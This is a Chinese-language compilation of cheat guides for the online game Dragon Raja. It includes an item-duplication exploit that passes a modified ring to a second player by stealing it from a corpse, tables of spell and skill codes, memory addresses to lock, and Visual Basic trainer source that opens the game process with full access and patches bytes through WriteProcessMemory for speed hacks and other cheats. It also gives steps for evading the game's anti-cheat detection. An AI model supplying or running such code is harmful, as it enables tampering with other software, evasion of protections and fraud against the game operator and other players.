符,在这一串地址的后面附近,会有三个地址,其余为数值为0,记住这三个连续的不为0的数值.还有后面较长
的属性代码.
3,用同样的方法搜索一个你的物品框中现有的装备,比如一根颤抖之杖,查出他的物品代码.将颤抖之杖的这
三个连续的地址换成第2步骤中的龙魂戒指的三个数值,再编辑后面的物品属性代码.要完全一致.不要试图
随意编辑后面的属性,想给自己加+1000CON,或者+1000INT等等.这样就全毁了.
4,做了这一步,基本上可以看到 <龙魂使之戒>了.最重要的一步来了,
5,依次将原颤抖之杖的最后方的一连串,无规则的地址全部按龙魂原封不动的替换,这里要小心,因为,你错
误编辑任何一个地址都将会导致龙族自动关闭.
6,全部工作做完以后,进入龙族,不要打开物品框!!!!一定不要打开物品框.也不要传送,也不要试图打开物
品框去点击已经生成的龙魂之戒.原地不要动,不要移动鼠标的动作或者任何需要去访问服务器的动作.
7,这时,你需要一个弓来偷你
8,活着时,不能偷!!一定不要偷,偷到这个物品的小偷会被T下线.小偷让线后,戒指会消失. 让一个弓,来秒
杀你,让弓来偷你的尸体.偷到改过的戒指的弓会被T下线,但是,弓上线后,戒指还在!!!!!

有些东西不能改，
１，物品的属性，不能随意添加。
２，有些特殊的物品不能改，装备不能改项链，但武器可以，还有就是戒指本身不能改成戒指，项链本身
不能改，纹章不能改。国内的不能改。
３，修改时不少朋友是使用的是直接使用编辑中的数值直接修改，这也不行。要点表格，一个地址，一个
地址的锁定。还有就是注意地址的偏移问题。要绝对精确，比如＜水晶戒指＞使用＜颤抖之杖＞来改，以
＜水晶戒指＞的英文物品名称为准，不要使用中文翻译的那个长度。地址数值缺的被“００”，多的删除
也改为００。大家可以试试其他物品。
４，还有就是一个修改的范围的问题，由于物品是一个挨一个，具体改多少地址为限，我比较笨，我的原
则是一直改到龙族自动退出为准，然后记下这个退出的地址，基本上需要修改的地址为整整４页。
５，修改后的物品并没有真正的在你的物品框里的数值，需要死亡一次，死亡后在变成灵魂状态的这一过程中，客户端会向服务器端返回一次物品及其他装备数值结果，并锁定你的鼠标点击效果。在这个时间内才能偷。成功概率并不低，我试验了３天，共４个龙魂。销毁了３个（扔到河里了）有一个样品。
--------------技能代码---------------

D0H 未开放技能
D1H 未开放技能
D2H 未开放技能
D3H 未开放技能
D4H 未开放技能
D5H 未开放技能
D6H 未开放技能
D7H 闪电爆裂
D8H 天雷波
D9H 闪电殛震
DAH 闪电破
DBH 闪电盾
DCH 究极之电
DDH 血之大地
DEH 袭地斩
DFH 血之意志
E0H 盘石之甲
E1H 施慕妮安的奥秘
E2H 究极大地
E3H 剑与玫瑰
E4H 多重火
E5H 急速飞弹
E6H 转换之甲
E7H 炎热回复术
E8H 究极之火
E9H 新星之毒
EAH 雀落之影
EBH 黑暗之刃
ECH 秦班的礼物
EDH 闾黑回复术
EEH 究极之闾
EFH 冰暴
F0H 无形迷踪
F1H 鲨鱼飞弹
F2H 冰山之号角
F3H 冰之甲
F4H 究极之冰
F5H 冲锋
F6H 双重攻击
F7H 回风
F8H 龙卷风
F9H 狂风
FAH 究极之风
FBH 未开放技能
FCH 未开放技能
FDH 未开放技能
FEH 未开放技能
FFH 未开放技能

--------------魔法代码---------------

01h 治疗术
02h 保护术
03h 防护罩
04h 解除毒素
05h 治疗疾病
06h 强力治疗术
07h 未开放魔法
08h 未开放魔法
09h 未开放魔法
0AH 缓慢术
0BH 混乱术
0CH 毒击术
0DH 石化术
0EH 真言术-镇
0FH 毒云术
10H 诱发疾病
11H 吸血鬼之触
12H 未开放魔法
13H 蛛网术
14H 某小怪隐身术
15H 武器加持术
16H 隐形术
17H 未开放魔法
18H 消除魔力
19H 魔力增微
1AH 魔力增幅
1BH 未开放魔法
1CH 火炎防御术
1DH 某怪火炎术
1EH 火球术
1FH 爆炎术
20H 未开放魔法
21H 火焰放射
22H 火墙术
23H 炎浪术
24H 启示录之炎
25H 寒冷防御术
26H 熊 - 冰弹
27H 冰弹
28H 未开放魔法
29H 半径五格冰环术
2AH 冰墙术
2BH 旋冰咒
2CH 冰暴风
2DH 半径九格冰环术
2EH 照明术
2FH 闪电防御术
30H 雷电召唤
31H 未开放魔法
32H 连环电击
33H 超新星电击
34H 电击术
35H 守护星
36H 半径五格雷击术
37H 初级怪兽召唤
38H 独眼巨人 - 怪兽召唤
39H 死神领主 - 怪兽召唤
3AH 中级怪兽召唤
3BH 暴风雪
3CH 冰之气息
3DH 血之电击
3EH 骷髅王 - 火焰烈
3FH 待查
40H 随机传送术
41H 某小怪的随机传送术
42H 瞬间移动
43H 某小怪的随机传送术
44H 某小怪的随机传送术
45H 某小怪的随机传送术
46H 某小怪的随机传送术
47H 未开放魔法
48H 未开放魔法
49H 未开放魔法
4AH 未开放魔法
4BH 魔力侦测
4CH 未开放魔法
4DH 未开放魔法
4EH 解除诅咒
4FH 防护长距离武器
50H 火鸟召唤
51H 焰星术
52H 神力丧失
53H 敏捷术
54H 高阶电击术
55H 夜魔 - 火鸟召唤
56H 龙鳞
57H 地狱三头犬 - 火击术
58H 地狱三头犬 - 怪兽召唤
59H 地狱三头犬 - 火焰状射
5AH 小炎魔 - 毒云术
5BH 小炎魔 - 瞬间移动
5CH 小炎魔 - 怪兽召唤
5DH 地狱女妖 - 毒云术
5EH 地狱女妖 - 瞬间移动
5FH 地狱女妖 - 怪物召唤
60H 火焰神魔 - 火炎炎
61H 火焰神魔 - 瞬间移动
62H 女巫妖 - 云海
63H 女巫妖 - 瞬间移动
64H 女巫妖 - 毒击
65H 女巫妖 - 怪物召唤
66H 某BOSS招式[待查]
67H 龟龙 - 冰石喷
68H 幼龙 - 帅气的眼神
69H 龙心 - 火海
6AH 火焰神魔 - 飞来炎炎
6BH 闪电神魔 - 电圈
6CH 龙心 - 血海
6DH 龙心 - 怪兽召唤
6EH 黑暗天使 - 火焰排阵
6FH 男黑暗天使 - 瞬间移动
70H 女黑暗天使 - 瞬间移动
71H 夜魔 - 怪物召唤
72H 沙虫 - 瞬间移动
73H 树妖 - 瞬间移动
74H 某BOSS招式[待查]
....未开放魔法,省略
97H 治疗圣言
98H 排除危险
99H 祝福术
9AH 解毒圣言
9BH 治病圣言
9CH 圣迹恢复
9DH MISS罩
9EH 奇迹之盾
9FH 圣力守护
A0H 圣力之镜
A1H 祈祷
A2H 圣光
A3H 圣歌
A4H 回溯圣言
A5H 神圣之火
A6H 高阶祈祷
A7H 评价术
A8H 灵魂评价（未开放魔法）
A9H 灵魂之声
AAH 圣洁之怒
ABH 超渡术
ACH 神的诅咒
ADH 治疗视力圣言
AEH 神威之力
AFH 幸运圣言
B0H 未开放魔法
B1H 夺目圣言
B2H 圣力回复
B3H 神圣治疗
B4H 未开放魔法
B5H 施慕妮安的权能
B6H 卡里斯纽曼的权能
B7H 雷提的权能
B8H 未开放魔法
B9H 亚色斯的权能
BAH 未开放魔法
BBH 华伦查的权能
BCH 未开放魔法
BDH 大地的愤怒
BEH 夺取生命值
BFH 火神的愤怒
...未开放魔法省略

其实龙族的代码从068—1.2虽然经过几次大的更改，但是，基本魔法代码依然没有变化。
别以为这个东西已经过时，其实这是修改龙族最基础最有效的东西，我的秘密武器，呵呵。
以下代码是我前段时间在068的基础上整理的，也许会有部分错误，请各位高手不吝赐教。
注：代码后空着的是我不能确定的魔法
？是068尚未开放的魔法
法师部分魔法代码： （我已经把它基本分好组了）

01-A0-A3 治疗
02-C5 保护术
03-A1 防护罩
04-2801 解除毒素
05-A8-B4 治病
06-AE01 强力治疗
07-9D01
08 ?
09 ?

0A-AA01 缓慢术
0B-B2 混乱术
0C-AF01 毒击术
0D-2A01
0E-A801
0F-A4 毒云术
10-2701 诱发疾病
11-9B01
12-ED

13-0201-0301-1801 蛛网术
14-79 白骨陷阱
15-9501 加持
16-9601 隐形
17
18-9E01
19-A501 魔力微增
1A
1B

1C-AF 火防
1D-2501 火焰箭
1E-9C-99 火球
1F-9B-B6 爆炎术
20 ?
21-B7 火焰放射
22-2901 火墙
23-AE-B6 炎浪
24-9E-B6 启示录
98-99 火鸟
6E-9D-9A-99 焰星术?

25-B0 寒冷防御
26-AA 冰箭术
27-BA-B3 冰弹
28 ?
29-B001-BE 半径五格冰
2A-B001-BE
2B-B1-AC 旋冰
2C-7301
2D-BC-BE 9冰？

2E-AC01 照明
2F-A2 闪电防御
30-BB-1A01 雷电召唤
31 ?
32-9C01-B9 连环电击
33-B201 超新星电击
34-AD-B9 电击术
35-6301
36-AB-B9 五雷

37-A201 初级怪兽召唤
38 ?
39 ?
3A-F0

40-FF 随机传送
41-2B01
42-9901
43-7E01
44-7F01-8001
45 ?
46 ?
47-A401

4B-83 魔力侦测
4D-2C01
4E-9701 解除诅咒
4F-A701 长防

52-1901 敏捷术
53-9A01
56-B301
58-B401
59-9F01

技能？
5C-E7-2601
5E-2601
5F-7D01 看幽灵？
60-8101
61-AB01
64-A901
65-2201
67-2101
6D-97
6E-9D
7D-7A
7E-7B
7F-7C

根据下面一个朋友的代码，我给出个JS魔法代码对照表
魔法名称 临时代码 魔法代码

治疗圣言 （97H） 2D01-6001-B4
排除危险 (98H) 2E01-6201
祝 福术 (99H) 2F01-5401
解毒圣言 (9AH) 3001-EB
治病圣言 (9BH) 3101-5501-B4
圣迹恢复 (9CH) 3201-A601
MISS罩 (9DH) 3301-AD01-BA01
奇迹之盾 (9EH) 3401-4D01
圣力守护 (9FH) 3501-5601-4A01
圣力之镜 (A0H) 3601-4B01
祈 祷 (A1H) 3701-6101
圣 光 (A2H) 3801-5B01-5C01
圣 歌 (A3H) 3901-6401
回溯圣言 (A4H) 3A01-5F01
神圣之火 (A5H) 3B01-?
高阶祈祷 (A6H) 3C01-5701
评 价术 (A7H) 3D01-F6
灵魂之声 (A9H) 3F01-AE01
圣洁之怒 (AAH) 4001-A101
超 度术 (ABH) 4101-5D01-FE
圣灵的愤怒:C0H
圣力回复:B2H
火海圣言:B6H
雷提:B7H
1转魔法神圣治疗:B3H
2转魔法亚色斯的权能:B8H
3转魔法华伦查的权能:B9H
####本例只是用来简单演示一些功能,并未用到读取指针得到存放人物动态数据指针的地址,继而实现连射
等一些功能,因为考虑到游戏的公平性
为了使大家能够尽可能多的享受龙族,所以这个例子仅限于加速,照明,无限捐款和远处呼叫NPC
编写中一个要注意的问题就是只有在照明开启成功的情况下呼叫NPC和无限捐款才能启动

Private Declare Function FindWindow Lib "USER32" Alias "FindWindowA" (ByVal lpClassName As
String, ByVal lpWindowName As String) As Long
Private Declare Function GetWindowThreadProcessId Lib "USER32" (ByVal hwnd As Long,
lpdwProcessId As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long,
ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long,
ByVal lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten
As Long) As Long
Dim DRHwnd As Long
Dim DRPid As Long
Dim DRProcessHandle As Long
Private Const PROCESS_ALL_ACCESS = &H1F0FFF

Private Sub Command1_Click()
OLE1.Visible = False
DRHwnd = FindWindow("DRAGONRAJA_CLASS", "")
GetWindowThreadProcessId DRHwnd, DRPid
DRProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, False, DRPid)
If DRProcessHandle = 0 Then
Label1.Caption = "外挂启动失败"
Else
Label1.Caption = "外挂启动成功"
Timer1.Enabled = True
End If
End Sub

Private Sub Command10_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H5F1CE2C, &H1, 1, 0&
End Sub

Private Sub Command11_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H60D0964, &H1, 1, 0&
End Sub

Private Sub Command12_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H60A4474, &H1, 1, 0&
End Sub

Private Sub Command13_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H60E6BDC, &H1, 1, 0&
End Sub

Private Sub Command2_Click()
OLE1.Visible = False
DRHwnd = FindWindow("DRAGONRAJA_CLASS", "")
GetWindowThreadProcessId DRHwnd, DRPid
DRProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, False, DRPid)
If DRProcessHandle = 0 Then
Label2.Caption = "加速启动失败"
Else
Label2.Caption = "加速启动成功"
WriteProcessMemory DRProcessHandle, &H474CE6, &HEB, 1, 0&
WriteProcessMemory DRProcessHandle, &H474D61, &HD2, 1, 0&
WriteProcessMemory DRProcessHandle, &H474D62, &H90, 1, 0&
End If
End Sub

Private Sub Command3_Click()
OLE1.Visible = False
DRHwnd = FindWindow("DRAGONRAJA_CLASS", "")
GetWindowThreadProcessId DRHwnd, DRPid
DRProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, False, DRPid)
If DRProcessHandle = 0 Then
Label3.Caption = "捐款失败"
Else
Label3.Caption = "可以捐款"
Timer3.Enabled = True
End If
End Sub

Private Sub Command4_Click()
OLE1.Visible = False
DRHwnd = FindWindow("DRAGONRAJA_CLASS", "")
GetWindowThreadProcessId DRHwnd, DRPid
DRProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, False, DRPid)
If DRProcessHandle = 0 Then
Label2.Caption = "加速关闭失败"
Else
Label2.Caption = "加速关闭成功"
WriteProcessMemory DRProcessHandle, &H474CE6, &H76, 1, 0&
WriteProcessMemory DRProcessHandle, &H474D61, &H55, 1, 0&
WriteProcessMemory DRProcessHandle, &H474D62, &HF4, 1, 0&
End If
End Sub

Private Sub Command5_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H60D7F8C, &H1, 1, 0&
End Sub

Private Sub Command6_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H5EE1CEC, &H1, 1, 0&
End Sub

Private Sub Command7_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H5F50944, &H1, 1, 0&
End Sub
Private Sub Command8_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H60B30C4, &H1, 1, 0&
End Sub

Private Sub Command9_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H60DF5B4, &H1, 1, 0&
End Sub

Private Sub Form_Load()

End Sub

Private Sub OLE1_Updated(Code As Integer)
OLE1.Visible = True
End Sub

Private Sub Timer1_Timer()
WriteProcessMemory DRProcessHandle, &H5DB144, &H1F, 1, 0&
End Sub

Private Sub Timer3_Timer()
WriteProcessMemory DRProcessHandle, &H5D98F8C, &H1, 1, 0&
WriteProcessMemory DRProcessHandle, &H5EF7F78, &H1, 1, 0&
End Sub

Private Sub 帮助_Click()
OLE1.Visible = True
End Sub

Private Sub 传送_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H5EE1CEC, &H1, 1, 0&
End Sub

Private Sub 服饰_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H60D0964, &H1, 1, 0&
End Sub

Private Sub 公告_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H5F1CE2C, &H1, 1, 0&
End Sub

Private Sub 关闭加速_Click()
OLE1.Visible = False
DRHwnd = FindWindow("DRAGONRAJA_CLASS", "")
GetWindowThreadProcessId DRHwnd, DRPid
DRProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, False, DRPid)
If DRProcessHandle = 0 Then
Label2.Caption = "加速关闭失败"
Else
Label2.Caption = "加速关闭成功"
WriteProcessMemory DRProcessHandle, &H474CE6, &H76, 1, 0&
WriteProcessMemory DRProcessHandle, &H474D61, &H55, 1, 0&
WriteProcessMemory DRProcessHandle, &H474D62, &HF4, 1, 0&
End If
End Sub

Private Sub 开启加速_Click(Index As Integer)
OLE1.Visible = False
DRHwnd = FindWindow("DRAGONRAJA_CLASS", "")
GetWindowThreadProcessId DRHwnd, DRPid
DRProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, False, DRPid)
If DRProcessHandle = 0 Then
Label2.Caption = "加速启动失败"
Else
Label2.Caption = "加速启动成功"
WriteProcessMemory DRProcessHandle, &H474CE6, &HEB, 1, 0&
WriteProcessMemory DRProcessHandle, &H474D61, &HD2, 1, 0&
WriteProcessMemory DRProcessHandle, &H474D62, &H90, 1, 0&
End If
End Sub

Private Sub 开启捐款_Click()
OLE1.Visible = False
DRHwnd = FindWindow("DRAGONRAJA_CLASS", "")
GetWindowThreadProcessId DRHwnd, DRPid
DRProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, False, DRPid)
If DRProcessHandle = 0 Then
Label3.Caption = "捐款失败"
Else
Label3.Caption = "可以捐款"
Timer3.Enabled = True
End If
End Sub

Private Sub 开启照明_Click(Index As Integer)
OLE1.Visible = False
DRHwnd = FindWindow("DRAGONRAJA_CLASS", "")
GetWindowThreadProcessId DRHwnd, DRPid
DRProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, False, DRPid)
If DRProcessHandle = 0 Then
Label1.Caption = "外挂启动失败"
Else
Label1.Caption = "外挂启动成功"
Timer1.Enabled = True
End If
End Sub

Private Sub 面包_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H60B30C4, &H1, 1, 0&
End Sub

Private Sub 木材_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H60DF5B4, &H1, 1, 0&
End Sub

Private Sub 铁匠_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H60A4474, &H1, 1, 0&
End Sub
Private Sub 药水店_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H60D7F8C, &H1, 1, 0&
End Sub

Private Sub 银行_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H5F50944, &H1, 1, 0&
End Sub

Private Sub 制弓_Click(Index As Integer)
WriteProcessMemory DRProcessHandle, &H5E23E8, &H0, 1, 0&
WriteProcessMemory DRProcessHandle, &H60E6BDC, &H1, 1, 0&
End Sub

首先运行龙族，进入游戏后切换到桌面，进入系统文件夹下的SYSTME32文件夹，找到
mcirlecd.dll和mcirleda这两个文件，把他们剪切到桌面，然后就可以正常使用FPE修改龙族了

无限名声：
都锁1
05D957AC [请锁定]
05EF4798 [请锁定]
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
无限看魂：
烫第1个CC上49行后12个位置锁1为看魂，锁0为看不到魂
非祭师系还需在锁1的后2个位置锁数值为1000以上
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
无限照明：
005D9F00 锁1Fh或1F以上 [请锁定]
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
加速部份：
00473D46 76改EB [请直接更改数值即可]
00473DC1 55改D2 [请直接更改数值即可]
00473DC2 F4改90 [请直接更改数值即可]
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
呼叫NPC部份
固定地址005E1174 锁0
以下锁1
----------银行： 05F4D164
------占星术士： 0606D17C
--------药水店： 060D47AC
----------传送： 05EDE50C
--------面包店： 060AF8E4
----------公告： 05F1964C
------公会仓库： 05E6F8B4
------制弓箭所： 060E33FC
--------木工店： 060DBDD4
--------裁缝店： 060CD184
----------铁匠： 060A0C94
----------旅店： 06280CBC
艾德布洛伊神殿： 060233EC
--------鲜肉铺： 060BE534
----------农场： 060A82BC
--------草药店： 060B6F0C
--------杂货铺： 06245B7C
----------学院： 060747A4
--------腊烛店： 060C5B5C
----------酒吧： 0622F904
--------换色坊： 05E8D154
--竞技分排行榜： 061E5B74
用写入热键的可以不锁定，不用写入热键的请先锁定，然后再解除锁定状态即可正常使用！
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
瞬间移动部份[图例]
http://www.yiboo.net/userimages/ufcc@163.com/mm01.JPG
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
魔法循环部份[火系魔法循环图例]
http://www.yiboo.net/userimages/ufcc@163.com/mm02.jpg
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
魔法代码部份：
--------------魔法代码---------------
01h 治疗术
02h 保护术
03h 防护罩
04h 解除毒素
05h 治疗疾病
06h 强力治疗术
07h 未开放魔法
08h 未开放魔法
09h 未开放魔法
0AH 缓慢术
0BH 混乱术
0CH 毒击术
0DH 石化术
0EH 真言术-镇
0FH 毒云术
10H 诱发疾病
11H 吸血鬼之触
12H 未开放魔法
13H 蛛网术
14H 某小怪隐身术
15H 武器加持术
16H 隐形术
17H 未开放魔法
18H 消除魔力
19H 魔力增微
1AH 魔力增幅
1BH 未开放魔法
1CH 火炎防御术
1DH 某怪火炎术
1EH 火球术
1FH 爆炎术
20H 未开放魔法
21H 火焰放射
22H 火墙术
23H 炎浪术
24H 启示录之炎
25H 寒冷防御术
26H 熊 - 冰弹
27H 冰弹
28H 未开放魔法
29H 半径五格冰环术
2AH 冰墙术
2BH 旋冰咒
2CH 冰暴风
2DH 半径九格冰环术
2EH 照明术
2FH 闪电防御术
30H 雷电召唤
31H 未开放魔法
32H 连环电击
33H 超新星电击
34H 电击术
35H 守护星
36H 半径五格雷击术
37H 初级怪兽召唤
38H 独眼巨人 - 怪兽召唤
39H 死神领主 - 怪兽召唤
3AH 中级怪兽召唤
3BH 暴风雪
3CH 冰之气息
3DH 血之电击
3EH 骷髅王 - 火焰烈
3FH 待查
40H 随机传送术
41H 某小怪的随机传送术
42H 瞬间移动
43H 某小怪的随机传送术
44H 某小怪的随机传送术
45H 某小怪的随机传送术
46H 某小怪的随机传送术
47H 未开放魔法
48H 未开放魔法
49H 未开放魔法
4AH 未开放魔法
4BH 魔力侦测
4CH 未开放魔法
4DH 未开放魔法
4EH 解除诅咒
4FH 防护长距离武器
50H 火鸟召唤
51H 焰星术
52H 神力丧失
53H 敏捷术
54H 高阶电击术
55H 夜魔 - 火鸟召唤
56H 龙鳞
57H 地狱三头犬 - 火击术
58H 地狱三头犬 - 怪兽召唤
59H 地狱三头犬 - 火焰状射
5AH 小炎魔 - 毒云术
5BH 小炎魔 - 瞬间移动
5CH 小炎魔 - 怪兽召唤
5DH 地狱女妖 - 毒云术
5EH 地狱女妖 - 瞬间移动
5FH 地狱女妖 - 怪物召唤
60H 火焰神魔 - 火炎炎
61H 火焰神魔 - 瞬间移动
62H 女巫妖 - 云海
63H 女巫妖 - 瞬间移动
64H 女巫妖 - 毒击
65H 女巫妖 - 怪物召唤
66H 某BOSS招式[待查]
67H 龟龙 - 冰石喷
68H 幼龙 - 帅气的眼神
69H 龙心 - 火海
6AH 火焰神魔 - 飞来炎炎
6BH 闪电神魔 - 电圈
6CH 龙心 - 血海
6DH 龙心 - 怪兽召唤
6EH 黑暗天使 - 火焰排阵
6FH 男黑暗天使 - 瞬间移动
70H 女黑暗天使 - 瞬间移动
71H 夜魔 - 怪物召唤
72H 沙虫 - 瞬间移动
73H 树妖 - 瞬间移动
74H 某BOSS招式[待查]
75H 未开放魔法
76H 未开放魔法
77H 未开放魔法
78H 未开放魔法
79H 未开放魔法
7AH 未开放魔法
7BH 未开放魔法
7CH 未开放魔法
7DH 未开放魔法
7EH 未开放魔法
7FH 未开放魔法
80H 未开放魔法
81H 未开放魔法
82H 未开放魔法
83H 未开放魔法
84H 未开放魔法
85H 未开放魔法
86H 未开放魔法
87H 未开放魔法
88H 未开放魔法
89H 未开放魔法
8AH 未开放魔法
8BH 未开放魔法
8CH 未开放魔法
8DH 未开放魔法
8EH 未开放魔法
8FH 未开放魔法
90H 未开放魔法
91H 未开放魔法
92H 未开放魔法
93H 未开放魔法
94H 未开放魔法
95H 未开放魔法
96H 未开放魔法
97H 治疗圣言
98H 排除危险
99H 祝福术
9AH 解毒圣言
9BH 治病圣言
9CH 圣迹恢复
9DH MISS罩
9EH 奇迹之盾
9FH 圣力守护
A0H 圣力之镜
A1H 祈祷
A2H 圣光
A3H 圣歌
A4H 回溯圣言
A5H 神圣之火
A6H 高阶祈祷
A7H 评价术
A8H 灵魂评价（未开放魔法）
A9H 灵魂之声
AAH 圣洁之怒
ABH 超渡术
ACH 神的诅咒
ADH 治疗视力圣言
AEH 神威之力
AFH 幸运圣言
B0H 未开放魔法
B1H 夺目圣言
B2H 圣力回复
B3H 神圣治疗
B4H 未开放魔法
B5H 施慕妮安的权能
B6H 卡里斯纽曼的权能
B7H 雷提的权能
B8H 未开放魔法
B9H 亚色斯的权能
BAH 未开放魔法
BBH 华伦查的权能
BCH 未开放魔法
BDH 大地的愤怒
BEH 夺取生命值
BFH 火神的愤怒
C0H 圣灵的愤怒
C1H 未开放魔法
C2H 未开放魔法
C3H 未开放魔法
C4H 未开放魔法
C5H 未开放魔法
C6H 未开放魔法
C7H 未开放魔法
C8H 未开放魔法
C9H 未开放魔法
CAH 未开放魔法
CBH 未开放魔法
CCH 未开放魔法
CDH 未开放魔法
CEH 未开放魔法
CFH 未开放魔法

--------------技能代码---------------
D0H 未开放技能
D1H 未开放技能
D2H 未开放技能
D3H 未开放技能
D4H 未开放技能
D5H 未开放技能
D6H 未开放技能
D7H 闪电爆裂
D8H 天雷波
D9H 闪电殛震
DAH 闪电破
DBH 闪电盾
DCH 究极之电
DDH 血之大地
DEH 袭地斩
DFH 血之意志
E0H 盘石之甲
E1H 施慕妮安的奥秘
E2H 究极大地
E3H 剑与玫瑰
E4H 多重火
E5H 急速飞弹
E6H 转换之甲
E7H 炎热回复术
E8H 究极之火
E9H 新星之毒
EAH 雀落之影
EBH 黑暗之刃
ECH 秦班的礼物
EDH 闾黑回复术
EEH 究极之闾
EFH 冰暴
F0H 无形迷踪
F1H 鲨鱼飞弹
F2H 冰山之号角
F3H 冰之甲
F4H 究极之冰
F5H 冲锋
F6H 双重攻击
F7H 回风
F8H 龙卷风
F9H 狂风
FAH 究极之风
FBH 未开放技能
FCH 未开放技能
FDH 未开放技能
FEH 未开放技能
FFH 未开放技能
游戏修改教学部份：
最热门修改方法

1、如何解除龙族对FPE的屏蔽？
答：修改FPE的文件名和安装所在的文件夹名即可。

2、如何查找自己想要的魔法代码？
答：这里公布最低级的两个魔法代码
（这里我写的是16进制值，他们的对比表简单如下：
十六进制：0,1,2,3,4,5,6,7,8,9,0A,0B,0C,0D,0E,0F,10,11依此内推……
十进位制：0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17依此内推……）
祭师系法术[治疗圣言]97h
法师系法术[治疗疾病]05h
弓箭系战技[多重火]e4h
盗贼系战技[冰暴]efh
一般来说,魔法代码和战技代码都是按顺序排列的组合，我们看下面这组祭师系法术代码：
97h 治疗圣言
98h 排除危险
99h 祝福术
这表示他的法术代码是按顺序、有规律地排放的！也就是说，你现在可以用祭师打开帮助看看法术那一页，就可以知道祭师系所以法术的代码了：）
再看下面这组弓盗战技的法术：
e4h 多重火
↓后移4个数字（位置）
e8h 究极之火
↓后移7个数字（位置）
efh 冰暴
↓后移2个数字（位置）
f1h 沙鱼飞弹
↓后移3个数字（位置）
f4h 究极之冰
大家可以打开战斗技能学习的页面看看，中间的差值是不是刚好与学习战斗技能的排列值相吻合，现在，你应该可以清楚地知道其他的比如战士的战斗技能代码是多少了吧？
注：法师系魔法代码不能按此查找。因为官方对法师系魔法的改动很大，经常变动！如何确定你想要的法师系魔法呢？首先用基本代码找到该地址“（第7答），然后更换魔法，用热键呼出FPE，在编辑中点更新，看看代码变成了什么就知道了！这也是最准确的办法！

3、如何查找人物晃动值
答：人物晃动值是指你的角色在移动中或战斗攻击的时候，出现的比较贴进真实感的一种惯性，如果把这个值锁定为1，那么在移动中或战斗中将可以提高人物的速度，相当于小加速。
如何查找人物晃动值，一般可以在调用的FPE中，选择编辑一栏，然后点选搜索，输入你所正在使用的角色的名字，（注意：查找这种值要加单引号，比如你的角色叫本拉登，那么查找时要输入’本拉登’。一直查到最后一个名字为止。
通常状态下，如果从地址00004000开始查起，那么将会查到十多个，当然是最后一个是有效的，经过长期分析总结，有一个比较实用的小方法，一次性搜索就可以查到，也就是先把地址更改为0B000000并按回车键，使地址定位在0B000000这个地址，这时你只搜索一次，一般查到的就是最后一个人物名字地址。
查到最后一个名字后，请往下翻15行左右，这里你会看到一串
01 01 01 01 01 02 02 02 02 10 10 ……
这样的地址，这时候你点更新，会发现在这段地址的上一行有一个不断跟着‘更新’变化跳动的数字，这就是人物晃动值，把它锁为1就行了！（注：如果你是用热键呼出来的FPE的话，你点更新将看不到任何变化，请切换回龙族后，用Alt+Tab切换出来）

4、如何查找简单冰箭地址？
答：冰箭地址在人物晃动值的后四位，锁值为2后(从01h~0Fh是不同的攻击值，棍术的连击也有，但是具体如何让其打出实际攻击，正在研究中)，打出来的就是冰箭了（但必须你的神圣力量或法术力量值被锁定，要不你射不了几下就要……），如果不清楚我写下面这个示例：
（这是人物晃动值锁定值）01 00 00 00 02（这是冰暴锁定值）

5、如何锁定魔法能量？
